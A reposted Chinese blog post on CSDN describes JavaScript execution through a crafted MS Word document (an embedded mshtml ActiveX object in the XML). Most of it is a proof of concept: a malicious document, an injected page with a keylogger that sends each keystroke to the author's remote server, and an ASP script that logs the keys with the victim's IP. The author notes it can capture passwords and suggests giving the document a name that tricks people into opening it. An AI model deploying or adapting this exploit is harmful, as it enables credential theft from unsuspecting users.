对MS word javascript execution的一些测试

最新推荐文章于 2024-07-18 11:12:39 发布
最新推荐文章于 2024-07-18 11:12:39 发布
阅读量624 收藏
点赞数
分类专栏: 脚本网页语言安全和网站攻防 文章标签: javascript xmlhttprequest function xml 文档 file
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2488710
版权

<script type="text/javascript"> </script> <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"> </script> name="google_ads_frame" marginwidth="0" marginheight="0" src="http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-1460049757379518&dt=1211904002541&lmt=1211904002&output=html&slotname=0491039036&correlator=1211904002541&url=http%3A%2F%2Fhuaidan.org%2Farchives%2F2009.html&ref=http%3A%2F%2Fhuaidan.org%2Fpage%2F2&frm=0&cc=100&ga_vid=1733618417.1211287439&ga_sid=1211902862&ga_hid=1401323678&ga_fc=true&flash=9.0.124.0&u_h=768&u_w=1024&u_ah=734&u_aw=1024&u_cd=16&u_tz=480&u_java=true" frameborder="0" width="200" scrolling="no" height="200" allowtransparency="allowtransparency">

作者:余弦
来源:0×37 Security

Microsoft word javascript execution原文:http://marc.info/?l=bugtraq&m=121121432823704&w=2,hi群内讨论过。可以得出一些结论:

1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能,使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code:

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js&gt;&lt;/script&gt;')"></OBJECT>

这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。

2、漏 洞其实出现在xml文件上,类似于上面这样构造后的html用word打开后另存为xml时,里面的数据都被相应转换为xml格式。然而xml里 的<w:ocx w:data=”……” />却可以引发JS的执行。问题就出现在这。而无论后缀是.doc或.rtf或.xml都将以word默认方式打开,此时word充当一个解释 器,<w:ocx w:data=”……” />内的数据被解释执行而引发JS。

3、AE24FDAE-03C6-11D1-8B76-0080C744F389是mshtml.dll的classid。要找出漏洞起因与修补这个漏洞这些信息还是有价值的。

既然这个JS能力有限,那就来点好玩的,如这里提到过的:http://www.0×37.com/post/15.html。下面这个POC是这样进行的:当用户打开我们恶意构造后的word文档doc.doc后,会弹出校内网的首页http://www.xiaonei.com(拿它做实验,完全是出于我的惯性……)。接着我们就可以记录用户在这个页面上的键盘记录了:)。也许密码就直接抓过来了(假如其他用户和我一样,打开校内网就直接快速输入密码然后Enter,这个完全是习惯……)。

doc.html代码如下:

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20′http://www.0×37.com/Project/poc/docshell.html’;}}}catch(e){}},3000);void(1);”></OBJECT>
HI

按照http://marc.info/?l=bugtraq&m=121121432823704&w=2这里的方法生成doc.doc文档(这就是那个邪恶的文档,改个好名字,方便骗人打开)。

远程的docshell.html代码如下:

<html>
<body bgcolor="#333333">
<div id="o"></div>
<input type=text id="x" style="width:0;height:0">
<script>
var _x=false;
if(window.XMLHttpRequest){
_x=new XMLHttpRequest();
}else if(window.ActiveXObject){
_x=new ActiveXObject("Msxml2.XMLHTTP");
if(!_x){_x=new ActiveXObject("Microsoft.XMLHTTP");}
}
document.onkeydown=function(e){
if(!e)e=window.event;
try{
tmp=(String.fromCharCode(e.which||e.keyCode));
_3or7("GET","http://www.0×37.com/Project/poc/docshell.asp?tmp=”+tmp,null);
}catch(ex){}
}
function _3or7(_m,_s,_a){
_x.open(_m,_s,false);
_x.send(_a);
return _x.responseText;
}
setInterval(function(){try{document.getElementById(’x').focus();}catch(e){}},100);
focus();
</script>
</body>
</html>

而远程的docshell.asp代码如下:

<%
ip=Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If ip="" Then
ip=Request.ServerVariables("REMOTE_ADDR")
End If
tmp=Request.QueryString("tmp")
'Response.write(tmp)
filename="docshell.txt"
Set fso=Server.CreateObject("Scripting.FileSystemObject")
set file=fso.OpenTextFile(server.mappath(filename),8,true)
file.write(ip+">> "+tmp+chr(13))
file.close
set file=nothing
set fso=nothing
%>

接着就可以在这http://www.0×37.com/Project/poc/docshell.txt看到我们键盘记录的结果:)。完整文件在这:http://www.0×37.com/Project/poc/wordjs.rar。不过这个键盘记录还是有缺陷的,本想结合这里http://www.0×37.com/post/15.html提到的方法来构造更邪恶的代码,可是并不顺利……那以后再说了:)。现在就等关于这个漏洞的进一步消息

iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python 接口并发测试详解
悦分享
10-23 6815
性能测试是通过自动化测试工具模拟多种正常、峰值及异常负载条件对系统的各项性能指标进行的测试。负载测试和压力测试都属于性能测试,两者可以结合进行。通过负载测试,确定在各种工作负载下系统的性能,目标是测试当负载逐渐增加时,系统各项性能指标的变化情况。压力测试是通过确定一个系统的瓶颈或者不能接受的性能点,来获得系统能提供的最大服务级别的测试。性能测试的重点是测试在并发条件下服务或系统的瓶颈所在,从而优化相关功能,可能涉及软件及硬件的多方面改进。由此可见,性能测试对整个产品非常重要,甚至可以决定一个产品是否能长久发
前端开发之JavaScript
冠军阿狗的博客
04-10 760
前端开发之JavaScript一、JavaScript概述1. JavaScript的历史2. JavaScript组成3. JavaScript的引入方式二、JavaScript的基础1. 变量2. 基础规范3. 常量和标识符4. 数据类型三、ECMAScript 运算符1. ECMAScript 算数运算符2. ECMAScript 逻辑运算符3. ECMAScript 赋值运算符4. ECM...
word文档的读取定位小问题
weixin_30835933的博客
08-02 146
做对WORD文档读取时会经常对定位有问题,在msdn中有一个WordApp的小程序,本文就以它为例 准备:初学者对找WORD控件有很大问题,要在对office 2003中添加/更改对Net的支持 然后加入using Microsoft.Office.Interop.Word; 这样就可以引用word功能了 现在是定位问题,要对某段字符进行改变 start = 37; end =40; ...
Frida JavaScript API学习
xiaohuihui的博客
10-21 6685
文章目录全局 ModuleFridaScriptThreadModuleModule 对象常见获取方式Module 对象属性Module 对象方法枚举(imports, exports, symbols, ranges)find/get ExportByNameModule 模块方法 (加载、寻找等) 注:本篇博文主要翻译自 Frida JavaScript API 官方文档 https://frida.re/docs/javascript-api/ 如需转载,请注明出处!!! 全局 Module Fr
前端需要理解的 JavaScript 知识
薛定谔的猫-前端领域
08-24 827
如果是函数执行上下文则首先给当前执行上下文的变量对象添加形参及初始值,否则先添加函数声明(函数表达式属于后面的变量声明)及初始值,再添加变量声明(带声明 var/let/const 关键字的)及初始值,完成后被激活为。JavaScriptJS)是单线程的、基于原型的、弱类型的、动态类型的、轻量的、支持面向对象/命令式/声明式编程的、头等函数的、多范式的、解释性(直译式或即时编译)的、也可在非浏览器环境下使用的动态脚本语言。是与执行上下文相关的数据作用域,存储了在上下文中定义的变量和函数声明。
JavaScript
sin37的专栏
11-08 250
JavaScript 1JavaScript概述 历史 3大部分组成 引入方式 2JavaScript的基础 1 变量 变量是弱类型的很随便 声明变量时不用声明变量类型 全都使用var关键字 一行可以声明多个变量并且可以是不同类型 了解 声明变量时 可以不用var 如果不用var 那么它是全局变量 变量命名首字符只能是字母下划线美元符 三选一且区分大小写x与X是两个变量 变量还应遵守以下某条著名的命
开发人员在JavaScript中犯的9个最常见错误(以及如何解决)
cumi6497的博客
08-19 864
JavaScript is a scripting language used in webpages to add functionality and interactivity. For a beginner coming from a different programming language, JavaScript is quite easy to understand. With a ...
检测WORD文档是否加密
chijie6848的博客
12-11 3331
Maven Dependencies <dependency> <groupId>org.apache.tika</groupId> <artifactId>tika-core...
NMAP6 网络探索和安全审计秘籍(五)
最新发布
龙哥盟
07-18 355
Nmap 脚本引擎于 2007 年在版本 4.5 中推出,以利用在端口或网络扫描期间收集的信息,并使用强大的脚本语言 Lua 执行附加任务,从而将 Nmap 的功能扩展到一个全新的水平。这一功能已经成为一个完整的武器库,已经正式包含了近 300 个脚本。您可以通过这一功能完成的任务数量令人印象深刻,就像您在本书中学到的那样。Lua 是一种脚本语言,目前在其他重要项目中使用,如魔兽世界、Wireshark 和 Snort,有很好的原因。Lua 非常轻量级和可扩展。
execution:javascript任务的执行类
06-20
javascript 任务的执行类。 安装 npm install execution 用法 var Execution = require ( 'execution' ) ; var Concat = Execution . extend ( { options : { separator : { description : "Concatenated input...
东信和平测试平台Execution v5.0
12-17
"东信和平测试平台Execution v5.0"是...使用者需具备一定的编程基础,特别是对ECN和JavaScript的理解,以便充分利用这个平台进行高效、安全的自动化测试。同时,遵循提供的安装和使用指南,能确保测试过程的顺利进行。
JavaScript优化专题之Loading and Execution加载和运行
10-22
开发者应尽量减少在页面加载过程中出现的阻塞,通过将JavaScript代码尽可能地放在页面底部,以减少对页面下载的影响,并使用现代浏览器提供的并行下载功能来提升页面的加载性能。这些方法有助于提供更快的页面加载...
一文扫清对 JavaScript 中的疑惑
01-08
**EC(Execution Context,执行环境/执行上下文)**是 JavaScript 运行时的环境,包含了变量、函数等信息。而**Scope(作用域)**是指变量和函数的可见性范围。EC 不完全等于作用域,前者包含后者,作用域是根据 EC ...
深入理解JavaScript系列(11) 执行上下文(Execution Contexts)
10-28
执行上下文(Execution Contexts,简称EC)是JavaScript语言的核心概念之一,它是ECMAScript标准中的抽象机制,用于管理和执行代码。每当JavaScript引擎遇到可执行代码时,都会创建一个新的执行上下文,以此来区分...
Perl Underground 5
热门推荐
08-26 1万+
  $$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ %%%%%%%% X x $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ %%%%%%%% x H H $$
WINDOWS下使用EXPECT的简单例子
09-14 8052
这是一个自动登录AIX服务器的例子。 1、先去如下地方下载expect:windows">http://expect.nist.gov/#windowsftp://bmrc.berkeley.edu/pub/winnt/tcltk/expect2、安装默认路径是C:Program FilesExpect-5.21binexpect.exe就在这里3、写个简单的脚本sample.tx
crt应用脚本一例子,windows下的expect
09-14 2859
日常工作有大量cisco路由器,交换机设备备份,telnet设备需要通过其一台服务器(solaris系统)进入,因网络关系无法通过TFTP完成备份.因此程序通过crt软件脚本实现.作:gyhong# $language = "VBScript"# $interface = "1.0"Cnstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=db.mdb
Dvbbs 8.2 login_sql注入漏洞探析
07-17 2851
挺无聊的,分析下”洞网/”,环境架好后.找到有问题的语句:       End If       Else              username=trim(Dvbbs.CheckStr(request("username")))              If ajaxPro Then username = unescape(username)       End If
JavaScript应用实战:客户端搜索与在线测试
- **Section 2.2 The Syntax Breakdown**:对测试脚本的语法进行了剖析,帮助读者理解如何处理问题和答案的逻辑。 - **Section 2.3 index.html—The Frameset**:展示了如何使用HTML框架来布局测试页面,包括试题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值